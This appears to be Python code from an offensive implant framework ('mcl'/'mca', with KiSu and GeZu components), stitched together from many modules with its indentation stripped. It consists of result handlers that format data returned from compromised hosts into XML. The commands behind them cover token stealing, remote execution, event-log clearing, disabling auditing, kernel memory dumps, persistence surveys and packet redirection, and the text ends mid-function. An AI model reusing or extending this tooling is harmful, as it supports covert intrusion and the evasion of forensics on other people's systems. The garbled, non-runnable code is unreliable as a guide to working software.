def DataHandlerMain(namespace, InputFilename, OutputFilename):
import mcl.imports
import mcl.data.Input
import mcl.data.Output
import mcl.status
import mcl.target
import mcl.object.Message
mcl.imports.ImportNamesWithNamespace(namespace, 'mca.survey.cmd.sidlookup',
globals())
input = mcl.data.Input.GetInput(InputFilename)
output = mcl.data.Output.StartOutput(OutputFilename, input)
output.Start('SidLookup', 'sidlookup', [])
msg = mcl.object.Message.DemarshalMessage(input.GetData())
if input.GetStatus() != mcl.status.MCL_SUCCESS:
errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
moduleError = errorMsg.FindU32(
mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
output.RecordModuleError(moduleError, osError, errorStrings)
output.EndWithStatus(input.GetStatus())
return True
result = Result()
result.Demarshal(msg)
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Sid')
xml.AddSubElementWithText('Id', result.id)
xml.AddSubElementWithText('Name', result.name)
output.RecordXml(xml)
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
def _handleDuplicateTokenSteal(msg, output):
import mcl.data.env
if msg.GetCount() == 0:
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
info = ResultSteal()
info.Demarshal(msg)
try:
alias = 'proc%u' % info.id
mcl.data.env.SetValue('_USER_%s' % alias,
'0x%08x' % info.hUser,
globalValue=True)
aliasSet = True
except:
output.RecordError('Failed to set alias for user')
aliasSet = False
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Logon')
xml.AddAttribute('handle', '0x%08x' % info.hUser)
if aliasSet:
xml.AddAttribute('alias', alias)
output.RecordXml(xml)
output.GoToBackground()
output.End()
return True
def DataHandlerMain(namespace, InputFilename, OutputFilename):
import mcl.imports
import mcl.data.Input
import mcl.data.Output
import mcl.status
import mcl.target
import mcl.object.Message
mcl.imports.ImportNamesWithNamespace(namespace, 'mca.file.cmd.copy',
globals())
input = mcl.data.Input.GetInput(InputFilename)
output = mcl.data.Output.StartOutput(OutputFilename, input)
output.Start('Copy', 'copy', [])
msg = mcl.object.Message.DemarshalMessage(input.GetData())
if input.GetStatus() != mcl.status.MCL_SUCCESS:
errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
moduleError = errorMsg.FindU32(
mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
output.RecordModuleError(moduleError, osError, errorStrings)
output.EndWithStatus(input.GetStatus())
return True
results = Result()
results.Demarshal(msg)
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Results')
xml.AddSubElementWithText('Source', results.fullSrcPath)
xml.AddSubElementWithText('Destination', results.fullDstPath)
output.RecordXml(xml)
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
def DataHandlerMain(namespace, InputFilename, OutputFilename):
import mcl.imports
import mcl.data.Input
import mcl.data.Output
import mcl.status
import mcl.target
import mcl.object.Message
mcl.imports.ImportNamesWithNamespace(namespace,
'mca.process.cmd.remoteexecute',
globals())
input = mcl.data.Input.GetInput(InputFilename)
output = mcl.data.Output.StartOutput(OutputFilename, input)
output.Start('RemoteExecute', 'remoteexecute', [])
msg = mcl.object.Message.DemarshalMessage(input.GetData())
if input.GetStatus() != mcl.status.MCL_SUCCESS:
errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
moduleError = errorMsg.FindU32(
mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
output.RecordModuleError(moduleError, osError, errorStrings)
output.EndWithStatus(input.GetStatus())
return True
results = Result()
results.Demarshal(msg)
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('RemoteProcess')
xml.AddSubElementWithText('Id', '%u' % results.processId)
xml.AddSubElementWithText('RetVal', '%d' % results.returnValue)
output.RecordXml(xml)
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
def DataHandlerMain(namespace, InputFilename, OutputFilename):
import mcl.imports
import mcl.data.Input
import mcl.data.Output
import mcl.status
import mcl.target
import mcl.object.Message
mcl.imports.ImportNamesWithNamespace(namespace, 'mca.file.cmd.rmdir',
globals())
input = mcl.data.Input.GetInput(InputFilename)
output = mcl.data.Output.StartOutput(OutputFilename, input)
output.Start('Rmdir', 'rmdir', [])
msg = mcl.object.Message.DemarshalMessage(input.GetData())
if input.GetStatus() != mcl.status.MCL_SUCCESS:
errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
moduleError = errorMsg.FindU32(
mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
output.RecordModuleError(moduleError, osError, errorStrings)
output.EndWithStatus(input.GetStatus())
return True
result = Result()
result.Demarshal(msg)
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('TargetDir')
xml.SetText('%s' % result.fullPath)
output.RecordXml(xml)
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
def DataHandlerMain(namespace, InputFilename, OutputFilename):
import mcl.imports
import mcl.data.Input
import mcl.data.Output
import mcl.status
import mcl.target
import mcl.object.Message
mcl.imports.ImportNamesWithNamespace(namespace,
'mca.gezu.cmd.GeZu_KernelMemory',
globals())
input = mcl.data.Input.GetInput(InputFilename)
output = mcl.data.Output.StartOutput(OutputFilename, input)
output.Start('GeZu_KernelMemory', 'GeZu_KernelMemory', [])
msg = mcl.object.Message.DemarshalMessage(input.GetData())
if input.GetStatus() != mcl.status.MCL_SUCCESS:
errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
moduleError = errorMsg.FindU32(
mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
output.RecordModuleError(moduleError, osError, errorStrings)
output.EndWithStatus(input.GetStatus())
return True
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('GeZu_KernelMemoryResponse')
results = Result()
results.Demarshal(msg)
sub = xml.AddSubElement('MemDump')
sub.SetTextAsData(results.memDump)
output.RecordXml(xml)
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
def _handleSchedulerDelete(output, msg):
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Deleted')
output.RecordXml(xml)
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
def DataHandlerMain(namespace, InputFilename, OutputFilename):
import mcl.imports
import mcl.data.Input
import mcl.data.Output
import mcl.msgtype
import mcl.status
import mcl.target
import mcl.object.Message
mcl.imports.ImportNamesWithNamespace(namespace, 'mca.security.cmd.eventlogclear', globals())
input = mcl.data.Input.GetInput(InputFilename)
output = mcl.data.Output.StartOutput(OutputFilename, input)
output.Start('EventLogClear', 'eventlogclear', [])
msg = mcl.object.Message.DemarshalMessage(input.GetData())
if input.GetStatus() != mcl.status.MCL_SUCCESS:
errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
moduleError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
output.RecordModuleError(moduleError, osError, errorStrings)
output.EndWithStatus(input.GetStatus())
return True
results = Result()
results.Demarshal(msg)
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Cleared')
if len(results.target) > 0:
xml.AddAttribute('target', results.target)
xml.SetText(results.logName)
output.RecordXml(xml)
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
def DataHandlerMain(namespace, InputFilename, OutputFilename):
import mcl.imports
import mcl.data.Input
import mcl.data.Output
import mcl.status
import mcl.target
import mcl.object.Message
mcl.imports.ImportNamesWithNamespace(namespace, 'mca.status.cmd.uptime',
globals())
input = mcl.data.Input.GetInput(InputFilename)
output = mcl.data.Output.StartOutput(OutputFilename, input)
output.Start('UpTime', 'uptime', [])
msg = mcl.object.Message.DemarshalMessage(input.GetData())
if input.GetStatus() != mcl.status.MCL_SUCCESS:
errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
moduleError = errorMsg.FindU32(
mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
output.RecordModuleError(moduleError, osError, errorStrings)
output.EndWithStatus(input.GetStatus())
return True
data = Result()
data.Demarshal(msg)
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Uptime')
xml.AddTimeElement('Duration', data.upTime)
if data.idleTime.GetTimeType() != data.idleTime.MCL_TIME_TYPE_NOT_A_TIME:
xml.AddTimeElement('IdleTime', data.idleTime)
output.RecordXml(xml)
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
def DataHandlerMain(namespace, InputFilename, OutputFilename):
import mcl.imports
import mcl.data.Input
import mcl.data.Output
import mcl.data.env
import mcl.status
import mcl.target
import mcl.object.Message
mcl.imports.ImportNamesWithNamespace(namespace, 'mca.file.cmd.put',
globals())
input = mcl.data.Input.GetInput(InputFilename)
output = mcl.data.Output.StartOutput(OutputFilename, input)
output.Start('Put', 'put', [])
msg = mcl.object.Message.DemarshalMessage(input.GetData())
if input.GetStatus() != mcl.status.MCL_SUCCESS:
errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
moduleError = errorMsg.FindU32(
mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
output.RecordModuleError(moduleError, osError, errorStrings)
output.EndWithStatus(input.GetStatus())
return True
if msg.GetCount() == 0:
mcl.data.env.SetValue(LP_ENV_PUT_COMPLETE, 'true')
return True
results = Result()
try:
results.Demarshal(msg)
except:
output.RecordError('Failed to get callback parameters')
mcl.data.env.SetValue(LP_ENV_ERROR_ENCOUNTERED, 'true')
output.EndWithStatus(mcl.target.CALL_FAILED)
return True
if len(results.filePath) > 0:
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Results')
xml.AddSubElementWithText('File', results.filePath)
output.RecordXml(xml)
mcl.data.env.SetValue(LP_ENV_FILE_OPENED, 'true')
bytesLeft = int(mcl.data.env.GetValue(LP_ENV_BYTES_LEFT))
totalBytes = int(mcl.data.env.GetValue(LP_ENV_FILE_SIZE))
if results.bytesWritten > bytesLeft:
output.RecordError('Target reported more data written than is left?!')
mcl.data.env.SetValue(LP_ENV_ERROR_ENCOUNTERED, 'true')
output.EndWithStatus(mcl.target.CALL_FAILED)
return True
if results.bytesWritten > 0:
bytesLeft -= results.bytesWritten
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Results')
xml.AddAttribute('bytesWritten', '%u' % results.bytesWritten)
xml.AddAttribute('bytesLeft', '%u' % bytesLeft)
xml.AddAttribute('totalBytes', '%u' % totalBytes)
output.RecordXml(xml)
mcl.data.env.SetValue(LP_ENV_BYTES_LEFT, '%u' % bytesLeft)
output.End()
return True
def _handleWindowStationData(msg, output):
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('WindowStations')
while msg.GetNumRetrieved() < msg.GetCount():
if mcl.CheckForStop():
return mcl.target.CALL_FAILED
submsg = msg.FindMessage(MSG_KEY_RESULT_WINDOW_STATION)
info = ResultWindowStations()
info.Demarshal(submsg)
sub = xml.AddSubElement('WindowStation')
sub.AddAttribute('name', info.name)
if info.openStatus != 0:
error = output.TranslateOsError(info.openStatus)
sub.AddAttribute('status', error)
else:
sub.AddAttribute('flags', '0x%08x' % info.flags)
if info.flags & RESULT_WINSTA_FLAG_VISIBLE:
sub.AddSubElement('WindowStationFlag_Visible')
while submsg.GetNumRetrieved() < submsg.GetCount():
if mcl.CheckForStop():
return mcl.target.CALL_FAILED
desktop = submsg.FindString(MSG_KEY_RESULT_WINDOW_STATION_DESKTOP)
sub.AddSubElementWithText('Desktop', desktop)
output.RecordXml(xml)
return mcl.target.CALL_SUCCEEDED
def _handlePacket(mca, sock, pktSize, tgtParams):
import mcl
import mcl.tasking
import array
import socket
recvBuffer = array.array('B')
i = 0
while i < pktSize:
recvBuffer.append(0)
i = i + 1
packetToSend = array.array('B')
total = 0
while total < pktSize:
if mcl.CheckForStop():
mcl.tasking.TaskSetStatus(mcl.target.CALL_FAILED)
raise RuntimeError('Context is no longer valid')
numRcvd = sock.recv_into(recvBuffer, pktSize - total)
if numRcvd == 0:
raise socket.error('Connection closed by remote host')
i = 0
while i < numRcvd:
packetToSend.append(recvBuffer[i])
i = i + 1
total = total + numRcvd
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('PacketData')
xml.AddAttribute('size', '%u' % pktSize)
xml.SetTextAsData(packetToSend)
mcl.tasking.OutputXml(xml)
_sendPacket(mca, tgtParams, packetToSend)
def _handleWindowsData(msg, output):
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Windows')
while msg.GetNumRetrieved() < msg.GetCount():
if mcl.CheckForStop():
return mcl.target.CALL_FAILED
info = ResultWindowInfo()
info.Demarshal(msg)
sub = xml.AddSubElement('Window')
sub.AddAttribute('hWnd', '0x%x' % info.hWnd)
sub.AddAttribute('hParent', '0x%x' % info.hParent)
sub.AddAttribute('pid', '%u' % info.owningPid)
sub.AddAttribute('title', info.text)
sub.AddAttribute('x', '%d' % info.x)
sub.AddAttribute('y', '%d' % info.y)
sub.AddAttribute('width', '%u' % info.width)
sub.AddAttribute('height', '%u' % info.height)
if info.flags & RESULT_WININFO_FLAG_IS_VISIBLE:
sub.AddSubElement('WindowIsVisible')
if info.flags & RESULT_WININFO_FLAG_IS_MINIMIZED:
sub.AddSubElement('WindowIsMinimized')
output.RecordXml(xml)
return mcl.target.CALL_SUCCEEDED
def _handleList(namespace, output, msg):
import mcl.imports
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('KiSuEnumeration')
while msg.GetNumRetrieved() < msg.GetCount():
if mcl.CheckForStop():
return mcl.target.CALL_FAILED
result = ResultInstance()
result.Demarshal(msg)
if result.id != 0:
sub = xml.AddSubElement('KiSu')
sub.AddAttribute('id', '0x%08x' % result.id)
sub.AddAttribute('versionMajor', '%u' % result.versionMajor)
sub.AddAttribute('versionMinor', '%u' % result.versionMinor)
sub.AddAttribute('versionFix', '%u' % result.versionFix)
sub.AddAttribute('versionBuild', '%u' % result.versionBuild)
mcl.imports.ImportWithNamespace(namespace, 'mcf.kisu.ids',
globals())
for name in mcf.kisu.ids.nameTable:
if mcf.kisu.ids.nameTable[name] == result.id:
sub.AddAttribute('name', name)
break
output.RecordXml(xml)
return mcl.target.CALL_SUCCEEDED
def _handleQueryData(msg, output):
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('QueryResponse')
while msg.GetNumRetrieved() < msg.GetCount():
if mcl.CheckForStop():
output.EndWithStatus(mcl.target.CALL_FAILED)
return False
data = ResultQuery()
data.Demarshal(msg)
sub = xml.AddSubElement('Resource')
sub.AddSubElementWithText('Name', data.name)
if data.hasPath:
sub.AddSubElementWithText('Path', data.path)
type = sub.AddSubElement('Type')
if data.admin:
type.AddAttribute('admin', 'true')
else:
type.AddAttribute('admin', 'false')
if data.type == RESULT_QUERY_TYPE_DISK:
type.SetText('Disk')
elif data.type == RESULT_QUERY_TYPE_DEVICE:
type.SetText('Device')
elif data.type == RESULT_QUERY_TYPE_PRINT:
type.SetText('Print')
elif data.type == RESULT_QUERY_TYPE_IPC:
type.SetText('IPC')
else:
type.SetText('Unknown')
sub.AddSubElementWithText('Caption', data.caption)
sub.AddSubElementWithText('Description', data.description)
output.RecordXml(xml)
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
def _handlePersistence(namespace, output, msg):
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('KiSuSurveyPersistence')
while msg.GetNumRetrieved() < msg.GetCount():
if mcl.CheckForStop():
output.EndWithStatus(mcl.target.CALL_FAILED)
return False
result = ResultPersistence()
result.Demarshal(msg)
sub = xml.AddSubElement('Method')
if result.type == RESULT_PERSISTENCE_TYPE_LAUNCHER:
sub.AddSubElementWithText('Type', 'DRIVER')
elif result.type == RESULT_PERSISTENCE_TYPE_SOTI:
sub.AddSubElementWithText('Type', 'SOTI')
elif result.type == RESULT_PERSISTENCE_TYPE_JUVI:
sub.AddSubElementWithText('Type', 'JUVI')
else:
sub.AddSubElementWithText('Type', 'UNKNOWN')
if result.compatible:
sub.AddSubElementWithText('Compatible', 'true')
else:
sub.AddSubElementWithText('Compatible', 'false')
if result.reason != 0:
mcl.imports.ImportWithNamespace(namespace, 'mcf.kisu.diba_errors',
globals())
if mcf.kisu.diba_errors.errorStrings.has_key(result.reason):
reasonStr = mcf.kisu.diba_errors.errorStrings[result.reason]
else:
reasonStr = 'Unknown (0x%08x)' % result.reason
sub.AddSubElementWithText('Reason', reasonStr)
output.RecordXml(xml)
return mcl.target.CALL_SUCCEEDED
def DataHandlerMain(namespace, InputFilename, OutputFilename):
import mcl.imports
import mcl.data.Input
import mcl.data.Output
import mcl.msgtype
import mcl.status
import mcl.target
import mcl.object.Message
mcl.imports.ImportNamesWithNamespace(namespace,
'mca.network.cmd.packetredirect',
globals())
input = mcl.data.Input.GetInput(InputFilename)
output = mcl.data.Output.StartOutput(OutputFilename, input)
output.Start('PacketRedirect', 'packetredirect', [])
msg = mcl.object.Message.DemarshalMessage(input.GetData())
if input.GetStatus() != mcl.status.MCL_SUCCESS:
errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
moduleError = errorMsg.FindU32(
mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
output.RecordModuleError(moduleError, osError, errorStrings)
else:
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('PacketSent')
output.RecordXml(xml)
output.End()
return True
def DataHandlerMain(namespace, InputFilename, OutputFilename):
import mcl.imports
import mcl.data.Input
import mcl.data.Output
import mcl.status
import mcl.target
import mcl.object.Message
mcl.imports.ImportNamesWithNamespace(namespace, 'mca.status.cmd.objects', globals())
input = mcl.data.Input.GetInput(InputFilename)
output = mcl.data.Output.StartOutput(OutputFilename, input)
output.Start('Objects', 'objects', [])
msg = mcl.object.Message.DemarshalMessage(input.GetData())
if input.GetStatus() != mcl.status.MCL_SUCCESS:
errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
moduleError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
output.RecordModuleError(moduleError, osError, errorStrings)
output.EndWithStatus(input.GetStatus())
return True
else:
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Objects')
gotValidDir = False
objectList = list()
sub = None
while msg.GetNumRetrieved() < msg.GetCount():
if mcl.CheckForStop():
output.RecordXml(xml)
output.EndWithStatus(mcl.target.CALL_FAILED)
return False
result = Result()
try:
result.Demarshal(msg)
except:
output.RecordXml(xml)
raise
if result.flags & RESULT_FLAG_DIR_START:
_dumpObjects(sub, objectList)
_deleteObjects(objectList)
sub = xml.AddSubElement('ObjectDirectory')
sub.AddAttribute('name', result.name)
if result.status != 0:
errorStr = output.TranslateOsError(result.status)
sub.AddSubElementWithText('QueryFailure', errorStr)
else:
gotValidDir = True
elif sub != None:
_addObject(objectList, result)
_dumpObjects(sub, objectList)
_deleteObjects(objectList)
output.RecordXml(xml)
if gotValidDir:
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
else:
output.EndWithStatus(mcl.target.CALL_FAILED)
return True
def DataHandlerMain(namespace, InputFilename, OutputFilename):
import mcl.imports
import mcl.data.Input
import mcl.data.Output
import mcl.status
import mcl.target
import mcl.object.Message
mcl.imports.ImportNamesWithNamespace(namespace, 'mca.status.cmd.windows',
globals())
input = mcl.data.Input.GetInput(InputFilename)
output = mcl.data.Output.StartOutput(OutputFilename, input)
output.Start('Windows', 'windows', [])
msg = mcl.object.Message.DemarshalMessage(input.GetData())
if input.GetStatus() != mcl.status.MCL_SUCCESS:
errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
moduleError = errorMsg.FindU32(
mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
if input.GetStatus() == ERR_INJECT_SETUP_FAILED or input.GetStatus(
) == ERR_INJECT_FAILED:
import mcl.injection.errors
output.RecordModuleError(moduleError, 0, errorStrings)
output.RecordModuleError(osError, 0,
mcl.injection.errors.errorStrings)
else:
output.RecordModuleError(moduleError, osError, errorStrings)
output.EndWithStatus(input.GetStatus())
return True
if msg.GetCount() == 0:
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Info')
xml.SetText('Action completed')
output.RecordXml(xml)
output.EndWithStatus(input.GetStatus())
return True
rtn = mcl.target.CALL_SUCCEEDED
for entry in msg:
if entry['key'] == MSG_KEY_RESULT_BUTTON:
if _handleButtonsData(msg, output) != mcl.target.CALL_SUCCEEDED:
rtn = mcl.target.CALL_FAILED
elif entry['key'] == MSG_KEY_RESULT_SCREENSHOT:
if _handleScreenShotData(msg, output) != mcl.target.CALL_SUCCEEDED:
rtn = mcl.target.CALL_FAILED
elif entry['key'] == MSG_KEY_RESULT_WINDOW_STATION:
if _handleWindowStationData(msg,
output) != mcl.target.CALL_SUCCEEDED:
rtn = mcl.target.CALL_FAILED
elif entry['key'] == MSG_KEY_RESULT_WINDOW_INFO:
if _handleWindowsData(msg, output) != mcl.target.CALL_SUCCEEDED:
rtn = mcl.target.CALL_FAILED
else:
output.RecordError('Unhandled data key (0x%08x)' % entry['key'])
rtn = mcl.target.CALL_FAILED
output.EndWithStatus(rtn)
return True
def _handleString(output, msg):
results = StringResult()
results.Demarshal(msg)
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('String')
xml.SetText(results.str)
output.RecordXml(xml)
return mcl.target.CALL_SUCCEEDED
def _handleGetFilter(output, msg):
results = ResultGetFilter()
results.Demarshal(msg)
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Filter')
_printFilter(results.adapterFilter, results.filter, xml)
output.RecordXml(xml)
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
def _handleAdapters(output, msg):
if msg.GetCount() == 0:
output.RecordError('No status values returned')
return mcl.target.CALL_FAILED
submsg = msg.FindMessage(MSG_KEY_RESULT_ADAPTERS)
results = ResultFilterInfo()
results.Demarshal(submsg)
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('AdaptersInfo')
if results.threadRunning:
xml.AddAttribute('threadRunning', 'true')
else:
xml.AddAttribute('threadRunning', 'false')
if results.filterActive:
xml.AddAttribute('filterActive', 'true')
else:
xml.AddAttribute('filterActive', 'false')
xml.AddAttribute('numAdapters',
'%u' % submsg.GetCount(MSG_KEY_RESULT_ADAPTER_NAME))
while submsg.GetNumRetrieved() < submsg.GetCount():
if mcl.CheckForStop():
return mcl.target.CALL_FAILED
name = submsg.FindString(MSG_KEY_RESULT_ADAPTER_NAME)
xml.AddSubElementWithText('Adapter', name)
output.RecordXml(xml)
return mcl.target.CALL_SUCCEEDED
def processSuspended(msg, output):
if msg.GetCount() == 0:
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Suspended')
output.RecordXml(xml)
output.GoToBackground()
output.End()
return True
def _handleNoAction(msg, output):
results = ResultNoAction()
results.Demarshal(msg)
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('NoAction')
output.RecordXml(xml)
if results.cleanup:
output.GoToBackground()
output.End()
return True
def DataHandlerMain(namespace, InputFilename, OutputFilename):
import mcl.imports
import mcl.data.Input
import mcl.data.Output
import mcl.status
import mcl.target
import mcl.object.Message
mcl.imports.ImportNamesWithNamespace(namespace,
'mca.survey.cmd.registryhive',
globals())
mcl.imports.ImportWithNamespace(namespace,
'mca.survey.cmd.registryhive.types',
globals())
input = mcl.data.Input.GetInput(InputFilename)
output = mcl.data.Output.StartOutput(OutputFilename, input)
output.Start('RegistryHive', 'registryhive', [])
msg = mcl.object.Message.DemarshalMessage(input.GetData())
if input.GetStatus() != mcl.status.MCL_SUCCESS:
errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
moduleError = errorMsg.FindU32(
mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
output.RecordModuleError(moduleError, osError, errorStrings)
output.EndWithStatus(input.GetStatus())
return True
if msg.GetCount() == 0:
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('CommandAction')
hive = ResultHive()
hive.Demarshal(msg)
action = 'Unknown'
if hive.action == mca.survey.cmd.registryhive.types.ACTION_LOAD:
action = 'Load'
elif hive.action == mca.survey.cmd.registryhive.types.ACTION_UNLOAD:
action = 'Unload'
elif hive.action == mca.survey.cmd.registryhive.types.ACTION_SAVE:
action = 'Save'
xml.AddAttribute('action', action)
sub = xml.AddSubElement('Hive')
sub.AddAttribute('key', hive.key)
sub.AddAttribute('hive', _getHiveString(hive.hive))
sub.AddAttribute('file', hive.file)
if hive.permanent:
sub.AddAttribute('permanent', 'true')
else:
sub.AddAttribute('permanent', 'false')
output.RecordXml(xml)
if action == 'Load' and hive.permanent == False:
output.GoToBackground()
output.End()
return True
def _handleVersion(output, msg):
version = ResultVersion()
version.Demarshal(msg)
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Version')
xml.AddSubElementWithText('Major', '%u' % version.major)
xml.AddSubElementWithText('Minor', '%u' % version.minor)
xml.AddSubElementWithText('Fix', '%u' % version.fix)
output.RecordXml(xml)
return mcl.target.CALL_SUCCEEDED
def _handleAuditModifyData(msg, output):
if msg.GetCount() == 0:
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('TurnedOff')
output.RecordXml(xml)
output.GoToBackground()
output.End()
return True
def DataHandlerMain(namespace, InputFilename, OutputFilename):
import mcl.imports
import mcl.data.Input
import mcl.data.Output
import mcl.status
import mcl.target
import mcl.object.Message
mcl.imports.ImportNamesWithNamespace(namespace, 'mca.file.cmd.drives',
globals())
input = mcl.data.Input.GetInput(InputFilename)
output = mcl.data.Output.StartOutput(OutputFilename, input)
output.Start('Drives', 'drives', [])
msg = mcl.object.Message.DemarshalMessage(input.GetData())
if input.GetStatus() != mcl.status.MCL_SUCCESS:
errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
moduleError = errorMsg.FindU32(
mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
output.RecordModuleError(moduleError, osError, errorStrings)
output.EndWithStatus(input.GetStatus())
return True
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('Drives')
while msg.GetNumRetrieved() < msg.GetCount():
if mcl.CheckForStop():
output.RecordXml(xml)
output.EndWithStatus(mcl.target.CALL_FAILED)
return False
data = Result()
data.Demarshal(msg)
sub = xml.AddSubElement('Drive')
sub.AddSubElementWithText('Path', data.location)
sub.AddSubElementWithText('Type', _getDriveType(data.type))
if len(data.source) > 0:
sub.AddSubElementWithText('Source', data.source)
if len(data.filesystem) > 0:
sub.AddSubElementWithText('FileSystem', data.filesystem)
if len(data.options) > 0:
sub.AddSubElementWithText('Options', data.options)
if data.maxComponentLength > 0:
sub.AddSubElementWithText('MaximumComponentLength',
'%u' % data.maxComponentLength)
if data.volumeSerialNumber != 0:
sub.AddSubElementWithText(
'SerialNumber',
'%04x-%04x' % (data.volumeSerialNumber >> 16 & 65535,
data.volumeSerialNumber & 65535))
if data.flags != 0:
_addFlags(sub, data.flags)
output.RecordXml(xml)
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
def DataHandlerMain(namespace, InputFilename, OutputFilename):
import mcl.imports
import mcl.data.Input
import mcl.data.Output
import mcl.msgtype
import mcl.status
import mcl.target
import mcl.object.Message
mcl.imports.ImportNamesWithNamespace(namespace, 'mca.network.cmd.arp',
globals())
input = mcl.data.Input.GetInput(InputFilename)
output = mcl.data.Output.StartOutput(OutputFilename, input)
output.Start('Arp', 'arp', [])
msg = mcl.object.Message.DemarshalMessage(input.GetData())
if input.GetStatus() != mcl.status.MCL_SUCCESS:
errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
moduleError = errorMsg.FindU32(
mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
output.RecordModuleError(moduleError, osError, errorStrings)
output.EndWithStatus(input.GetStatus())
return True
else:
if msg.GetCount() == 0:
